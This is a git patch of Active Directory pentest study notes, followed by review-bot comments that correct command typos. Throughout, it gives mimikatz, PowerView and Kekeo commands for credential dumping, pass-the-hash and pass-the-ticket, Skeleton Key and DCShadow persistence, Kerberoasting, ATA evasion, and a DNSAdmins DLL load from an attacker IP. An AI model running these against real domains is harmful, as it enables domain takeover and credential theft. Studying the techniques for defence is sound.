From 38f3d51121e8a7f6b405e4b0bfce972895135740 Mon Sep 17 00:00:00 2001 
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Thu, 9 Dec 2021 17:11:17 +0500 Subject: [PATCH] Add files via upload --- .../Domain Enumeration/Bloodhound.md | 21 +++ .../Domain Persistance/3-Skeleton Key.md | 22 +++ Active Directory/Domain Persistance/4-DSRM.md | 65 +++++++++ .../Domain Persistance/5-Custom SSP.md | 2 + .../Domain Persistance/6-ACLs (pending).md | 1 + .../7-Security Descriptor (pending).md | 2 + .../1-Kerbeorasting.md | 54 ++++++++ .../2-AS REP Roasting.md | 54 ++++++++ .../3-Set SPN (pending ,video 15).md | 2 + .../4-Delegation.md | 126 ++++++++++++++++++ .../Domain Privilege Escalation/5-DNSAdmin.md | 39 ++++++ .../Enumeration/4-ACL (pending).md | 3 + .../1-Cross Forest Attacks (pending).md | 21 +++ .../2-Forest Persistence DC Shadow.md | 2 + 14 files changed, 414 insertions(+) create mode 100644 Active Directory/Domain Enumeration/Bloodhound.md create mode 100644 Active Directory/Domain Persistance/3-Skeleton Key.md create mode 100644 Active Directory/Domain Persistance/4-DSRM.md create mode 100644 Active Directory/Domain Persistance/5-Custom SSP.md create mode 100644 Active Directory/Domain Persistance/6-ACLs (pending).md create mode 100644 Active Directory/Domain Persistance/7-Security Descriptor (pending).md create mode 100644 Active Directory/Domain Privilege Escalation/1-Kerbeorasting.md create mode 100644 Active Directory/Domain Privilege Escalation/2-AS REP Roasting.md create mode 100644 Active Directory/Domain Privilege Escalation/3-Set SPN (pending ,video 15).md create mode 100644 Active Directory/Domain Privilege Escalation/4-Delegation.md create mode 100644 Active Directory/Domain Privilege Escalation/5-DNSAdmin.md create mode 100644 Active Directory/Enumeration/4-ACL (pending).md create mode 100644 Active Directory/Forest Attacks/1-Cross Forest Attacks (pending).md create mode 100644 Active Directory/Forest Attacks/2-Forest Persistence DC Shadow.md 
diff --git a/Active Directory/Domain Enumeration/Bloodhound.md b/Active Directory/Domain Enumeration/Bloodhound.md new file mode 100644 index 0000000..e712b28 --- /dev/null +++ b/Active Directory/Domain Enumeration/Bloodhound.md @@ -0,0 +1,21 @@ +# Domain Enumeration - Bloodhound + +Bloodhound is useful for gathering AD entities , relationships , it uses graph theory for providing the capability of mapping shortest path for interesting thing , it can find interesting things like `Domain Admins` , it has built-in queries. + +https://github.com/BloodHoundAD/BloodHound + +## Sharphound + +https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 + +### Generate archive + +``` +Invoke-BloodHound -CollectionMethod All +``` + +### Avoiding detection form Advanced Threat Analytics (ATA) +``` +Invoke-BloodHound -CollectionMethod All -ExcludeDC +``` + diff --git a/Active Directory/Domain Persistance/3-Skeleton Key.md b/Active Directory/Domain Persistance/3-Skeleton Key.md new file mode 100644 index 0000000..c23be6d --- /dev/null +++ b/Active Directory/Domain Persistance/3-Skeleton Key.md @@ -0,0 +1,22 @@ +# Domain Persistance - Skeleton key + +A Skeleton key is like a malware that is injected into LSASS process of Domain controller (DC), for this to achieve we need to be a domain admin in order to perfrom this , doing this will create a master password for all accounts in a domain ,existing passwords for those account will still work, this attack is done through `mimikatz`. The master password will not change until DC is rebooted + +## mimikatz.exe + +``` +privilege::debug +misc::skeleton +``` + + +## Mimikatz powershell +``` +Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -Computer computername.domain +``` + +Then we can just switch to other user + +``` +Enter-PSSession -ComputerName computername -Credential +``` 
diff --git a/Active Directory/Domain Persistance/4-DSRM.md b/Active Directory/Domain Persistance/4-DSRM.md new file mode 100644 index 0000000..480c908 --- /dev/null +++ b/Active Directory/Domain Persistance/4-DSRM.md 
@@ -0,0 +1,65 @@ +# Domain Persistance - DSRM + +Directory Service Restore Mode (DSRM) , every `Local Administrator` on Domain Controller `DC` is named `Administrator` account , this Administrator is called DSRM account and DSRM password is set when a DC is promoted. + +So it is possible to perfrom `Pass The Hash` attack after extracting NTLM hash of Local Administrator account , local administrator password is just a backup password if something goes wrong ,usually local administrator isn't used by DC + +## Using mimikatz.exe +``` +privilege:debug (to see privileges) +token::elevate (to become NT AUTHORITY\SYSTEM) +``` + +### Extracting Local Administrator password hash +``` +lsadump::sam +``` + +### Extracting Domain Administrator password hash + +``` +lsadump::lsa /patch +``` + +By default DSRM logon is disbaled , value is set to 0 , set the value to 2 + +``` +Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbos +``` + +if this entry doesn't exist , we can create it + +``` +New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose +``` + +Then + +``` +sekurlsa::pth /user:Administrator /domain:dominname /ntlm:ntlm_hash_of_local_admin +``` + +## Using mimikatz powershell + +This is for local administrator + +``` +Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam""' -Computername computername +``` + +This is for domain admin + +``` +Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername computername +``` + +now performing pass the hash + +``` +Invoke-Mimikatz -Command '"sekurlsa::pth /domain:domainname /user:Administrator /ntlm:local_admin_hash /run:powershell.exe"' +``` + + +``` +Enter-PSsession -Computername computer +``` \ No newline at end of file diff --git a/Active Directory/Domain Persistance/5-Custom SSP.md b/Active Directory/Domain Persistance/5-Custom SSP.md new file mode 100644 index 0000000..34c1eda 
--- /dev/null +++ b/Active Directory/Domain Persistance/5-Custom SSP.md @@ -0,0 +1,2 @@ +# Domain Persistance - Custom SSP +SSP stands for Security Support Provider \ No newline at end of file diff --git a/Active Directory/Domain Persistance/6-ACLs (pending).md b/Active Directory/Domain Persistance/6-ACLs (pending).md new file mode 100644 index 0000000..272eddf --- /dev/null +++ b/Active Directory/Domain Persistance/6-ACLs (pending).md @@ -0,0 +1 @@ +# Domain Persistance - ACLs \ No newline at end of file diff --git a/Active Directory/Domain Persistance/7-Security Descriptor (pending).md b/Active Directory/Domain Persistance/7-Security Descriptor (pending).md new file mode 100644 index 0000000..2511d91 --- /dev/null +++ b/Active Directory/Domain Persistance/7-Security Descriptor (pending).md @@ -0,0 +1,2 @@ +# Domain Persistance - Security Descriptor + diff --git a/Active Directory/Domain Privilege Escalation/1-Kerbeorasting.md b/Active Directory/Domain Privilege Escalation/1-Kerbeorasting.md new file mode 100644 index 0000000..5cc300a --- /dev/null +++ b/Active Directory/Domain Privilege Escalation/1-Kerbeorasting.md 
@@ -0,0 +1,54 @@ +# Domain Privilege Escalation - Kerberoasting + +Kerberoasting isn't an exploit or an attack it's abusing feature of windows for authenticating users in AD , + +## Steps in Kerberos + +- User logs on with username & password. + +- Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC (Key Distribution Centre also known as Domain Controller) as an authenticator in the authentication ticket (TGT) request Authenitcation Service Request (AS-REQ). The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc) & creates Ticket-Granting Ticket (TGT). + +- The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data. + +- **The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates PAC checksum . If the DC can open the ticket & the checksum check out, `TGT = valid`. The data in the TGT is effectively copied to create the TGS ticket.** + +- **The TGS is encrypted using the target service accounts’s NTLM password hash and sent to the user (TGS-REP).** + +- The user connects to the server hosting the service on the appropriate port & presents the TGS Application Request (AP-REQ). The service opens the TGS ticket using its NTLM password hash. + +- Optional mutual authentication is done by service that the user provides TGS ticket to + +## Kerberoasting + +Ticket Granting Service `TGS` has a server portion which is encrypted with service account's NTLM hash , we can request a TGS for a particular service when we want to connect to it and then cracking the hash , service accounts are usually ignored as passwords aren't changed and they might have some privileges. This can be used to create silver tickets. 
+ +In order to do this we need to have a valid domain user and there must be a SPN attached to a user (service account) + +## PowerView commands + +### Finding usser accounts used as a service account + +``` +Get-NetUser -SPN +``` + +### Request a TGS +``` +Request -SPNTicket +``` + +## AD Module + +### Finding usser accounts used as a service account + +``` +Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName +``` + +### Request a TGS +``` +Add-Type -AssemblyName System.IdentityModel + +New-Object System.IdentityModel.Toekns.KerberosRequestorSecurityToken -ArgumentList "MSSQLSVC/computername.domainname" +``` + diff --git a/Active Directory/Domain Privilege Escalation/2-AS REP Roasting.md b/Active Directory/Domain Privilege Escalation/2-AS REP Roasting.md new file mode 100644 index 0000000..f0f8cec --- /dev/null +++ b/Active Directory/Domain Privilege Escalation/2-AS REP Roasting.md 
@@ -0,0 +1,54 @@ +# Domain Privilege Escalation - AS REP Roasting + +If pre-authentication is disabled on a user account or a service account , meaning that UserAccountControl settings have `Don not require Kerberos preauthentication`, then it is possbile to request a TGT for that user account without any password but a valid username is required + +## Steps in Kerberos + +- **User logs on with username & password.** + +- **Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC (Key Distribution Centre also known as Domain Controller) as an authenticator in the authentication ticket (TGT) request Authenitcation Service Request (AS-REQ). The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc) & creates Ticket-Granting Ticket (TGT).** + +- **The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data.** + +- The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates PAC checksum . If the DC can open the ticket & the checksum check out, `TGT = valid`. The data in the TGT is effectively copied to create the TGS ticket. + +- The TGS is encrypted using the target service accounts’s NTLM password hash and sent to the user (TGS-REP) + +- The user connects to the server hosting the service on the appropriate port & presents the TGS Application Request (AP-REQ). The service opens the TGS ticket using its NTLM password hash. 
+ +- Optional mutual authentication is done by service that the user provides TGS ticket to + +## PowerView (dev) + +### Enumerating accounts with Kerberos preauth disabled + +``` +Get-DomainUser -PreauthNotRequired -Verbose +``` + +### Request encrypted AS-REP for offline brute force + +## AD Module + +### Enumerating accounts with Kerberos preauth disabled + +``` +Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth +``` + +## ASREP Roast + +https://github.com/HarmJ0y/ASREPRoast + + +### Request encrypted AS-REP for offline brute force + +``` +Get-ASREPHash -Username user -Verbose +``` + +### To enumerate all users with kerberos preauth disable and request a hash + +``` +Invoke-ASREPRoast -Verbose +``` \ No newline at end of file diff --git a/Active Directory/Domain Privilege Escalation/3-Set SPN (pending ,video 15).md b/Active Directory/Domain Privilege Escalation/3-Set SPN (pending ,video 15).md new file mode 100644 index 0000000..cda15df --- /dev/null +++ b/Active Directory/Domain Privilege Escalation/3-Set SPN (pending ,video 15).md @@ -0,0 +1,2 @@ +# Domain Privilege Escalation - Set SPN + diff --git a/Active Directory/Domain Privilege Escalation/4-Delegation.md b/Active Directory/Domain Privilege Escalation/4-Delegation.md new file mode 100644 index 0000000..7373824 --- /dev/null +++ b/Active Directory/Domain Privilege Escalation/4-Delegation.md 
@@ -0,0 +1,126 @@ +# Domain Privilege Escalation - Delegation + +Kerberos delegation allows to re use user's credentials to access resources hosted on a different server , this is done in mult-tier service where kerberos double hop is required + +Delegation could look like this where a user authenticates to web server , web server makes requests to database server but not as web service account but as the user account (that has authenticated) + +## Steps in delegation + +- User provides credentials to domain controller (DC) + +- DC returns a Ticket Granting Ticket (TGT) + +- User requests a Ticket Granting Service (TGS) for the service he wants to connects , let's say web service + +- User sends TGT and TGS to web server + +- Web service account uses the user's TGT to request to another service to use , let's assume database service + +- Web server's account connects to database server as the user + +## Types of delegations + +There are 2 types of delegations + +- Unconstrained Delegation +- Constratined Delegation + +## Unconstrained Delegation + +Unconstrained delegation allows first hop server to request access to any service on any computer in domain + +The way this delegation works is that domain controller places Ticket Granting Ticket (TGT) in Ticket Granting Service (TGS) , TGT is extracted from the TGS and TGT is stored in LSASS by the server , this way server can reuse user's TGT to access any resource in the domain as the user. 
+ +# PowerView + +### Discover domain computers which have unconstrained delegation + +``` +Get-NetComputer -UnConstrained +``` + +## AD Module +``` +Get-ADComputer -Filter {TrustedForDelegation -eq $True} +Get-ADUser -Filter {TrustedForDelegation -e $True} +``` + +# Mimikatz + +After finding that which computer or service has unconstrained delegation enabled , we will need to make a domain admin login to that service/computer and with administrative privileges on that computer we can use mimikatz to list the avaiable tickets in the session , as in unconstrained delegation , TGT will be loaded in LSASS so we can use that to get domain admin + +## Check if any domain admin token is available + +``` +Invoke-Mimikatz -Command '"sekurlsa::tickets"' +``` + +By running this command we can see a administrator token so use the command below to do `ptt` pass the ticket to load it into the current sessions + +``` +Invoke-Mimikatz -Command '"kerberos::ptt location_of_the_ticket(C:\Users\user\Documents\ticket_something)"' +``` + +## Constrained Delegation + +Constrained delegation allows first hop to request access to specific services on specific computers. It allows access only to specified services on specified computers as a user. + +It doesn't use kerberos when authenticating the user ,when a user authenticates to a web service , and the user requests something from database ,web server makes a requests using the authorized user account, to impersonate the user , `Service For user (S4U) extension is used ` that has two extensions + +- Service for user to self (S4U2Self) , it allows a service to obtain forwardable TGS to itself on behalf of a user. This must have `TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION` +- Service for User to proxy (S4U2Proxy) , it allows a service to obtain a TGS for second service on behalf of authorized user. 
This is controlled by `msDS-AllowedToDelegateTo` attribute that contains list of SPNs to which user tokens can be forwarded + +## Steps in constrained delegation + +- A user authenticates to web serivce using non kerberos authentication mechanism. + +- Web service requests a ticket from DC/KDC for the user's account without supplying the password as web service account. + +- KDC checks if web service account has `TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION` attribute and also if the user isn't blocked for delegation , then it forwards a S4U2Self ticket for the user's account. + +- Service then passes this ticket back to KDC and a request a service ticket for the another service let's say Database service. + +- KDC checks if `msDS-AllowedToDelegateTo` is on the web service account ,if service is listed then it will return the token for database service (S4U2proxy). + +- Web service can now authenticate to database service as the user's TGS to that service. + + +### PowerView (dev) + +#### Enumerate users and computers with constrained delegations enabled + +``` +Get-DomainUser -TrustedToAuth +Get-DomainComputer -TrustedToAuth +``` + +### AD Module + +#### Enumerate users and computers with constrained delegations enabled + +``` +Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null" -Properties msDS-AllowedToDeleagteTo} +``` + +### Kekeo.exe + +### Using `asktgt` we will first get the TGT of the service account that is allowed to delegate + +``` +tgt::ask /user:username /domain:domainname /rc4:ntlm_hash_of_user +``` + +### Using `s4u` , we request a TGS as any user on the service which we have permission to delegate + +``` +tgs::s4u /tgt:TGS_Ticket_of_service_account /user:Administrator@domainname /service:mssql +``` + +### Now using mimikatz , we can use pass the ticket to load the ticket in powershell session + +``` +Invoke-Mimikatz -Command '"kerebros::ptt administrator_ticket"' +``` + + + 
diff --git a/Active Directory/Domain Privilege Escalation/5-DNSAdmin.md b/Active Directory/Domain Privilege Escalation/5-DNSAdmin.md new file mode 100644 index 0000000..054beaf --- /dev/null +++ b/Active Directory/Domain Privilege Escalation/5-DNSAdmin.md @@ -0,0 +1,39 @@ +# Domain Enumeration - DNSAdmins + + +Members of `DNSAdmins` could load arbitary DLL with the privileges of dns.exe , if Domain Controller (DC) servers as DNS , we can perform escalation to Domain Admins (DA) + +## Powerview + +### Enumerate members of DNSAdmins group + +``` +Get-NetGroupMember -GroupName "DNSAdmins" +``` + +## AD Module + +### Enumerate members of DNSAdmins group + +``` +Get-ADGroupMember -Identity DNSAdmins +``` + +### Configure DLL using `dnscmd.exe` +``` +dnscmdd dc-name or 127.0.0.1 /config /serverlevelplugindll \\your_attacker_ip\dll\mimilib.dll +``` + +### Restart dns service + +``` +sc.exe stop dns +sc.exe sart dns +``` + + + +Or alternatively follow this + + +https://medium.com/r3d-buck3t/escalating-privileges-with-dnsadmins-group-active-directory-6f7adbc7005b \ No newline at end of file diff --git a/Active Directory/Enumeration/4-ACL (pending).md b/Active Directory/Enumeration/4-ACL (pending).md new file mode 100644 index 0000000..ca58ebc --- /dev/null +++ b/Active Directory/Enumeration/4-ACL (pending).md @@ -0,0 +1,3 @@ +# Domain Enumeration - Access Control List + +## \ No newline at end of file diff --git a/Active Directory/Forest Attacks/1-Cross Forest Attacks (pending).md b/Active Directory/Forest Attacks/1-Cross Forest Attacks (pending).md new file mode 100644 index 0000000..00502e2 --- /dev/null +++ b/Active Directory/Forest Attacks/1-Cross Forest Attacks (pending).md 
@@ -0,0 +1,21 @@ +# Forest Attacks - Cross Forest Attacks +DCShaodw temporarliy registers a new domain controller in the domain and uses it to push attributes like SIDHistory , SPNs and etc without leaving change logs for objects. + +New domain controller is registered by modifying configuration , SPNs of existing computer object and couple of RPC services + + +## Mimikatz + +We need two instances of mimikatz for `DCShadow` + +``` +!+ +!processtoken +lsadump::dcshadow /objec:rootuser /attribute:Description /value="Hello from DCShadow" +``` + +And the second instance with domain admin privileges + +``` +lsadump::dcshadow /push +``` diff --git a/Active Directory/Forest Attacks/2-Forest Persistence DC Shadow.md b/Active Directory/Forest Attacks/2-Forest Persistence DC Shadow.md new file mode 100644 index 0000000..28f0ea3 --- /dev/null +++ b/Active Directory/Forest Attacks/2-Forest Persistence DC Shadow.md @@ -0,0 +1,2 @@ +# Forest Attacks - Forest Persistence DC Shadow +
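Review bot: In `Bloodhound.md`, the heading `### Avoiding detection form Advanced Threat Analytics (ATA)` should read "from", and the opening sentence is a run-on with spaces before every comma; split it into two sentences (what BloodHound collects, then what the graph queries find). Since the two `Invoke-BloodHound` snippets differ only by `-ExcludeDC`, state in a line under the second heading what that switch leaves out of the collection, so the reader knows what data the "avoiding detection" variant sacrifices rather than treating it as a free option.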
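Review bot: In `3-Skeleton Key.md`, `Enter-PSSession -ComputerName computername -Credential` is missing the value for `-Credential`; the paragraph above it ("Then we can just switch to other user") should also say that the credential is any domain account with the master password the skeleton key introduced, otherwise the step is unclear. The sentence "for this to achieve we need to be a domain admin in order to perfrom this" says the same thing twice; keep "this requires Domain Admin privileges" and fix "perfrom". The directory and every heading in it spell "Persistance"; rename to "Persistence" consistently (`Domain Persistance/` appears in all four new files of this folder). The remote invocation uses `-Computer` here but `-Computername` in `4-DSRM.md`; use the full `-ComputerName` in both.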
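Review bot: In `4-DSRM.md`, the registry value name is misspelled: the documented value is `DsrmAdminLogonBehavior` (American spelling), so both `Set-ItemProperty ... -Name "DsrmAdminLogonBehaviour"` and the `New-ItemProperty` line would write a value the DC never reads. Other defects in the same hunk: `privilege:debug` needs the double colon (`privilege::debug`), the inline `(to see privileges)` / `(to become NT AUTHORITY\SYSTEM)` annotations belong in prose or comments rather than inside the fenced command, `-Verbos` should be `-Verbose`, and `'"token::elevate" "lsadump::sam""'` has an extra closing quote. In `sekurlsa::pth /user:Administrator /domain:dominname ...`, "dominname" is a typo, and since the text itself says this is the DC's local Administrator account from the SAM, the `/domain:` value should be the DC's hostname rather than the AD domain name; say so explicitly. Also fix "disbaled" and rewrite the first paragraph, which currently reads "every Local Administrator on Domain Controller is named Administrator account".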
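Review bot: `5-Custom SSP.md` contains only the expansion "SSP stands for Security Support Provider" with no explanation of why a custom SSP is a persistence mechanism and no commands; either mark the file "(pending)" like the ACL and Security Descriptor placeholders in the same folder, or hold it until there is content. The file also lacks a trailing newline.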
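Review bot: In `1-Kerbeorasting.md`, the PowerView command `Request -SPNTicket` is broken by the space; the cmdlet is `Request-SPNTicket`. In the AD Module block, `System.IdentityModel.Toekns.KerberosRequestorSecurityToken` misspells the namespace (`System.IdentityModel.Tokens`), so the `New-Object` call would fail. The filename itself misspells Kerberoasting (`Kerbeorasting.md`), and both `### Finding usser accounts` headings should read "user". The "Steps in Kerberos" list is copied verbatim into `2-AS REP Roasting.md` with only the bold markers moved; consider a single shared Kerberos-flow page referenced from both files. Since the text notes that service-account passwords are rarely changed, add a sentence stating the corresponding mitigation (long, rotated service-account passwords) so the page explains why the weakness exists rather than only how it is used.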
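Review bot: In `2-AS REP Roasting.md`, the PowerView (dev) section has a heading `### Request encrypted AS-REP for offline brute force` with no command under it; either add the command or drop the heading, since the same heading under the ASREPRoast section does have one. Typos: "Don not require Kerberos preauthentication" should quote the UserAccountControl flag as "Do not require Kerberos preauthentication", "possbile" should be "possible", and "preauth disable" should be "preauth disabled". The file has no trailing newline.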
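Review bot: In `4-Delegation.md`, two commands are wrong as written: `Get-ADUser -Filter {TrustedForDelegation -e $True}` needs `-eq`, and `Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null" -Properties msDS-AllowedToDeleagteTo}` places `-Properties` inside the filter braces and misspells the attribute; it should be `Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo`. The mimikatz module in `'"kerebros::ptt administrator_ticket"'` is `kerberos::ptt`. In the Kekeo section the heading says `asktgt` while the command is `tgt::ask`, and the placeholder `/tgt:TGS_Ticket_of_service_account` should name the TGT obtained in the previous step, not a TGS. The headings `# PowerView` and `# Mimikatz` are H1 inside a page whose other sections are H2/H3; demote them. Wording: "Constratined", "mult-tier", "serivce", and the dangling "This must have `TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION`" should say the service account must have that flag.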
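Review bot: In `5-DNSAdmin.md`, the title `# Domain Enumeration - DNSAdmins` does not match the file's location under Domain Privilege Escalation; rename to "Domain Privilege Escalation - DNSAdmins". Two commands contain typos that would make them fail: `dnscmdd dc-name or 127.0.0.1 /config ...` should be `dnscmd` with a single target placeholder rather than "dc-name or 127.0.0.1" inside the command, and `sc.exe sart dns` should be `sc.exe start dns`. The first sentence should read "arbitrary" and "serves as DNS". Since the procedure requires restarting the DNS service and changing the server-level plugin DLL setting, add a line noting that both are auditable events on the DC, which is the detection point for this technique.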
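Review bot: `4-ACL (pending).md` ends with a bare `## ` heading with no title and no trailing newline; remove the empty heading until the section has content.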
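Review bot: The DCShadow content is in the wrong file: `1-Cross Forest Attacks (pending).md` describes DCShadow under the title "Cross Forest Attacks", while `2-Forest Persistence DC Shadow.md`, added in the same patch, contains only its heading. Move the body to the DC Shadow file and leave the cross-forest file as the placeholder. In the first mimikatz block, `/objec:rootuser` should be `/object:rootuser`. The claim that the push happens "without leaving change logs for objects" is too strong given the next sentence, which states that registering the rogue DC modifies the configuration partition and the SPNs of an existing computer object; those modifications replicate and can be audited, so say that the attribute push itself bypasses the usual object change logging while the registration does not. Typos: "DCShaodw", "temporarliy".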